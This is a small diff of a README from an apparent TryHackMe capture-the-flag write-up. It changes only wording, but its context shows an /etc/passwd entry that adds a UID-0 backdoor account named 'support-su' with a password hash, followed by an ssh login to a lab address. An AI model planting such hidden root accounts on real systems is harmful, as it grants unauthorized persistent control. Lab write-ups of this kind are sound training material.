zinzloun/THM_WriteUP/README.md

     ....
     support-su:$6$xyz$QPpRe.vKRkmPLc0hZLHMNMuoYIM96CzLbWVluRaUH3NPycNnP6Z4WiGcI6v/kM7yDZu7rJALqIc8Pvgu64Akt.:0:0:root:/root:/bin/bash

-Actually we are inserting an alias for the root user called support-su.
-Now we can even login with ssh using the new added user:
+Actually we are inserting an alias for the root user called <b>support-su</b>.
+Now we can proceed to login with ssh using the newly added user:

     ssh support-su@10.200.95.33
     ...